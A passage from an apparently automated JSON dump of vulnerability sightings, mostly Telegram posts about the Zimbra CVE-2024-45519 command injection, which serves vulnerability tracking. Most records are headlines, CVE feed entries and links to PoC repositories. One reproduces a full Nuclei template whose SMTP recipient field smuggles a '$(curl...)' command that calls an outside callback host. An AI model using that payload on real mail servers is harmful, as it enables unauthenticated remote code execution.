\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b Magento/Adobe Commerce, \u0431\u044b\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u044b \u044d\u0442\u0438\u043c \u043b\u0435\u0442\u043e\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0432\u0435\u0431-\u0441\u043a\u0438\u043c\u043c\u0435\u0440 \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043e\u043f\u043b\u0430\u0442\u044b. 
\u0420\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u043d\u0430\u043f\u0435\u0440\u0435\u0433\u043e\u043d\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 CVE-2024-34102 (CosmicSting).\n\n\ud83c\udf44 FIN7 \u043b\u043e\u0432\u0438\u0442 \u043d\u0430 \u043a\u043b\u0443\u0431\u043d\u0438\u0447\u043a\u0443: \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 NetSupport RAT \u0447\u0435\u0440\u0435\u0437 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0434\u0438\u043f\u0444\u0435\u0439\u043a-\u043e\u0431\u043d\u0430\u0436\u0451\u043d\u043a\u0438.\n\n\ud83d\udcf1 \u0410 \u0432 App Store \u0438 Google Play \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0442\u0440\u0435\u0439\u0434\u0438\u043d\u0433\u0430 \u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0438\u0434\u0438\u043c\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0441\u0445\u0435\u043c pig butchering.\n\n\ud83c\udf83\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440\u043e\u0432: StealC (\u0430\u0436 \u0432 \u0442\u0440\u0451\u0445 
\u0447\u0430\u0441\u0442\u044f\u0445) \u0438 Amnesia.\n\n\ud83d\udc40 \u041d\u0430 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u0431\u044b\u043b\u0430 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0434\u0432\u0443\u0445 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439:  CVE-2024-29824 \u0432 Ivanti Endpoint Manager \u0438 CVE-2024-45519 \u0432 \u043f\u043e\u0447\u0442\u043e\u0432\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 Zimbra.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #APT #\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 @\u041f2\u0422", "creation_timestamp": "2024-10-07T15:36:21.000000Z"}, {"uuid": "3a4f3fcd-111c-4711-9564-763720cedc1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/6424", "content": "\ud83d\udea8CVE-2024-45519 - Zimbra Postjournal Exploit Setup\n\nhttps://darkwebinformer.com/cve-2024-45519-zimbra-postjournal-exploit-setup/", "creation_timestamp": "2024-11-05T22:12:11.000000Z"}, {"uuid": "76c65d80-cc55-42ff-84aa-2d02ae7fcddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/2101", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-29T17:32:28.000000Z"}, {"uuid": "12bb7c7b-f2f1-47a8-9b04-60477dd21efb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45511", "type": "seen", "source": "https://t.me/cvedetector/11655", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45511 - Zimbra Collaboration XSS Reflective File Upload Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45511 \nPublished : Nov. 20, 2024, 7:15 p.m. | 35\u00a0minutes ago \nDescription : An issue was discovered in Zimbra Collaboration (ZCS) through 10.1. A reflected Cross-Site Scripting (XSS) issue exists through the Briefcase module due to improper sanitization of file content by the OnlyOffice formatter. This occurs when the victim opens a crafted URL pointing to a shared folder containing a malicious file uploaded by the attacker. The vulnerability allows the attacker to execute arbitrary JavaScript in the context of the victim's session. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"20 Nov 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-11-20T21:16:55.000000Z"}, {"uuid": "99b4e808-7655-404f-9039-ea86a3ec03f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45510", "type": "seen", "source": "https://t.me/cvedetector/11661", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45510 - Zimbra Collaboration ZCS Stored Cross-Site Scripting (XSS) Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45510 \nPublished : Nov. 20, 2024, 8:15 p.m. | 39\u00a0minutes ago \nDescription : An issue was discovered in Zimbra Collaboration (ZCS) through 10.0. Zimbra Webmail (Modern UI) is vulnerable to a stored Cross-Site Scripting (XSS) attack due to improper sanitization of user input. This allows an attacker to inject malicious code into specific fields of an e-mail message. 
When the victim adds the attacker to their contacts, the malicious code is stored and executed when viewing the contact list. This can lead to unauthorized actions such as arbitrary mail sending, mailbox exfiltration, profile picture alteration, and other malicious actions. Proper sanitization and escaping of input fields are necessary to mitigate this vulnerability. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"20 Nov 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-11-20T22:07:13.000000Z"}, {"uuid": "3d0eccad-f043-4d27-934f-aa3bb6de2176", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45518", "type": "seen", "source": "https://t.me/cvedetector/8637", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45518 - Zimbra Collaboration SSRFleading to RCE\", \n  \"Content\": \"CVE ID : CVE-2024-45518 \nPublished : Oct. 22, 2024, 5:15 p.m. | 44\u00a0minutes ago \nDescription : An issue was discovered in Zimbra Collaboration (ZCS) 10.1.x before 10.1.1, 10.0.x before 10.0.9, 9.0.0 before Patch 41, and 8.8.15 before Patch 46. It allows authenticated users to exploit Server-Side Request Forgery (SSRF) due to improper input sanitization and misconfigured domain whitelisting. This issue permits unauthorized HTTP requests to be sent to internal services, which can lead to Remote Code Execution (RCE) by chaining Command Injection within the internal service. When combined with existing XSS vulnerabilities, this SSRF issue can further facilitate Remote Code Execution (RCE). 
\nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"22 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-22T20:28:39.000000Z"}, {"uuid": "18b515af-affc-4c92-a6ae-8ea0a6837af6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/1598", "content": "#exploit\n1. CVE-2024-45519: \nZimbra SMTP RCE\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution\n]-&gt; https://github.com/p33d/CVE-2024-45519\n\n2. CVE-2024-41110:\nDocker AuthZ plugins Security Checker\nhttps://github.com/vvpoglazov/cve-2024-41110-checker", "creation_timestamp": "2024-10-02T16:38:49.000000Z"}, {"uuid": "00677a7b-d12d-4b21-93d2-e6970249cda9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/455", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-45519 unauthenticated OS commoand Injection in Zimbra prior to 8.8.15***.\nURL\uff1ahttps://github.com/TOB1a3/CVE-2024-45519-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-26T14:25:00.000000Z"}, {"uuid": "dff0dc1f-b2e4-4a44-af11-f3234b22f447", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/4362", "content": "\ud83d\udea8PoC CVE-2024-45519 - Zimbra Postjournal 
Exploit\n\nhttps://darkwebinformer.com/poc-cve-2024-45519-zimbra-postjournal-exploit/", "creation_timestamp": "2024-10-05T18:46:25.000000Z"}, {"uuid": "05d3c9e9-1bd5-4e20-bd8d-c9baa75c394b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/cvedetector/6885", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45519 - Zimbra Collaboration Command Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45519 \nPublished : Oct. 2, 2024, 10:15 p.m. | 24\u00a0minutes ago \nDescription : The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands. \nSeverity: 10.0 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"03 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-03T00:43:48.000000Z"}, {"uuid": "d14f6fc1-0b15-4c8f-84a8-ac5aa9852d0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/CyberBulletin/1012", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:35:52.000000Z"}, {"uuid": "999125f8-3ec7-474c-8092-ddc645a63a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/515", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", 
"creation_timestamp": "2024-09-30T10:20:42.000000Z"}, {"uuid": "f9a2854f-8cd6-4438-9fa4-4822c7fdd918", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/z3xploit/668", "content": "PoC CVE-2024-45519 - Zimbra Postjournal Exploit \ud83c\udf4e\n\nExploit\n\n#Poc #cve #exploit", "creation_timestamp": "2024-10-10T09:54:11.000000Z"}, {"uuid": "eb44571b-4f63-4a99-b4f3-7610c3ef1858", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "Telegram/CkXBWnwBfBoySBukTmGlFhbCoxZd7mul-lMTkTsWlZiBLw", "content": "", "creation_timestamp": "2024-10-02T09:40:30.000000Z"}, {"uuid": "0f53449f-0fb2-49c5-9f41-7cfabd36f9a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/CyberBulletin/1096", "content": "\u26a1\ufe0fActive Exploits Target Zimbra Collaboration: Over 19K Systems Vulnerable to CVE-2024-45519.\n\n#CyberBulletin", "creation_timestamp": "2024-10-07T13:15:35.000000Z"}, {"uuid": "dece0112-4011-4e40-9ef5-0b3c3738df43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/22507", "content": "The Hacker News\nResearchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw\n\nCybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra Collaboration.\nEnterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. 
The attacks seek to exploit CVE-2024-45519, a severe security flaw in its postjournal service that could enable unauthenticated attackers to", "creation_timestamp": "2024-10-02T09:40:31.000000Z"}, {"uuid": "3e7fea30-d32a-46ac-8cf3-d64a4a755b64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/1662", "content": "Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\n#github #exploit #zimbra #rce", "creation_timestamp": "2024-10-06T05:30:19.000000Z"}, {"uuid": "af2bf742-5769-40e4-8d2e-67bf8df16dff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/ZeroEthical_Course/1607", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-29T12:26:59.000000Z"}, {"uuid": "e0154cfc-cd05-41fa-9949-18367bf4fe69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/HackingInsights/15377", "content": "\u200aActive Exploits Target Zimbra Collaboration: Over 19K Systems Vulnerable to CVE-2024-45519\n\nhttps://securityonline.info/active-exploits-target-zimbra-collaboration-over-19k-systems-vulnerable-to-cve-2024-45519/", "creation_timestamp": "2024-10-08T03:27:19.000000Z"}, {"uuid": "a2a5c24f-e245-423c-96b0-75286e7244b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18985", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", 
"creation_timestamp": "2024-09-29T17:32:28.000000Z"}, {"uuid": "fd3488df-0cb7-4d62-b67a-90b800becfaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/HackingInsights/15229", "content": "\u200aZimbra Email Servers Under Attack: CISA Flags CVE-2024-45519 as Actively Exploited\n\nhttps://securityonline.info/zimbra-email-servers-under-attack-cisa-flags-cve-2024-45519-as-actively-exploited/", "creation_timestamp": "2024-10-05T17:00:36.000000Z"}, {"uuid": "6e83d0fe-992d-4129-9efe-0473f016e069", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/HackingInsights/15046", "content": "Critical Zimbra Postjournal flaw CVE-2024-45519 actively exploited in the wild. Patch it now!\nhttps://ift.tt/duWePKx", "creation_timestamp": "2024-10-03T08:40:35.000000Z"}, {"uuid": "cb2cf514-9299-4cd4-9c74-4817cd7a1e40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/15385", "content": "\u200a19.6K+ Public Zimbra Installations Vulnerable to Code Execution Attacks \u2013 CVE-2024-45519\n\nhttps://gbhackers.com/zimbra-installations-code-execution-attack/", "creation_timestamp": "2024-10-08T03:27:20.000000Z"}, {"uuid": "f320026c-6323-4ba5-9792-27dc838eb3b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/pt_soft/376", "content": "\ud83c\udf83 CVE-2024-45519 : Zimbra - Remote Command Execution\n\nZimbra - \u0448\u0438\u0440\u043e\u043a\u043e 
\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430 \u0434\u043b\u044f \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u044b\n\nNuclei \u0448\u0430\u0431\u043b\u043e\u043d:\n\nid: CVE-2024-45519\n\ninfo:\n  name: Zimbra Collaboration Suite &lt; 9.0.0 - Remote Code Execution\n  author: pdresearch,iamnoooob,parthmalhotra,ice3man543\n  severity: critical\n  description: |\n    SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system\u2019s integrity and confidentiality.\n  reference:\n    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\n  classification:\n    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*\n  metadata:\n    vendor: synacor\n    product: zimbra_collaboration_suite\n    shodan-query:\n      - http.title:\"zimbra collaboration suite\"\n      - http.title:\"zimbra web client sign in\"\n      - http.favicon.hash:1624375939\n    fofa-query:\n      - title=\"zimbra web client sign in\"\n      - title=\"zimbra collaboration suite\"\n  tags: cve,cve2024,rce,zimbra\n\njavascript:\n  - pre-condition: |\n      isPortOpen(Host,Port);\n    code: |\n      let m = require('nuclei/net');\n      let address = Host+\":\"+Port;\n      let conn;\n      conn=  m.Open('tcp', address)\n      conn.Send('EHLO localhost\\r\\n');\n      conn.RecvString()\n      conn.Send('MAIL FROM: \\r\\n');\n      conn.RecvString()\n      conn.Send('RCPT TO: 
&lt;\"aabbb$(curl${IFS}'+oast+')\"@mail.domain.com&gt;\\r\\n');\n      conn.RecvString()\n      conn.Send('DATA\\r\\n');\n      conn.RecvString()\n      conn.Send('aaa\\r\\n');\n      conn.RecvString()\n      conn.Send('.\\r\\n');\n      resp = conn.RecvString()\n      conn.Send('QUIT\\r\\n');\n      conn.Close()\n      resp\n    args:\n      Host: \"{{Host}}\"\n      Port: 25\n      oast: \"{{interactsh-url}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        words:\n          - \"message delivered\"\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 9.0.0 Patch 41 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 10.0.9 \u0438 10.1.1 \u0438 Zimbra 8.8.15 Patch 46 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445\n\n\ud83d\udcbb PoC\n\n#rce #cve #zimbra #poc\n\n\u2708\ufe0f // Pentest HaT \ud83c\udfa9", "creation_timestamp": "2024-10-06T09:04:26.000000Z"}, {"uuid": "be9c394b-9c15-4530-8b86-04a69d9f2a10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/softrinx/151795", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-30T00:37:28.000000Z"}, {"uuid": "b45bf6e4-3b0b-4ddb-b7ce-5d79dff924af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "Telegram/1ZL9Gy8NcGFZ3EukYR7KgdreC6GML4uuvOnd8ACoqLrL-Q", "content": "", "creation_timestamp": "2024-10-02T10:21:54.000000Z"}, {"uuid": 
"688c45af-1f4a-4f72-8e5f-485bf7fc60d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/4798", "content": "The Hacker News\nResearchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw\n\nCybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra Collaboration.\nEnterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. The attacks seek to exploit CVE-2024-45519, a severe security flaw in its postjournal service that could enable unauthenticated attackers to", "creation_timestamp": "2024-10-02T09:40:31.000000Z"}, {"uuid": "a4dac830-028a-4c1d-bdc6-f614decfad2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1074", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security 
Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:25:19.000000Z"}, {"uuid": "0458c5ef-1991-41a3-9170-ffa4261d9d6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1039", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:\u00a0 Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n\nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:39.000000Z"}, {"uuid": "bc17480e-be20-4e66-b5ee-14af44a02b5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8888", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and 
cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:53.000000Z"}, {"uuid": "49783f6d-594f-4fe9-b90c-afa811a72bf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "Telegram/LZ7XOPRoqwALVNc8I3LUwpNf-8CJ2PR-4TjRcjv0Z8qsO3g", "content": "", "creation_timestamp": "2025-03-09T04:00:07.000000Z"}, {"uuid": "28554b3b-3f51-4eeb-a050-8c75efc91116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/KomunitiSiber/2661", "content": "Researchers Warn of Ongoing Attacks Exploiting Critical Zimbra Postjournal 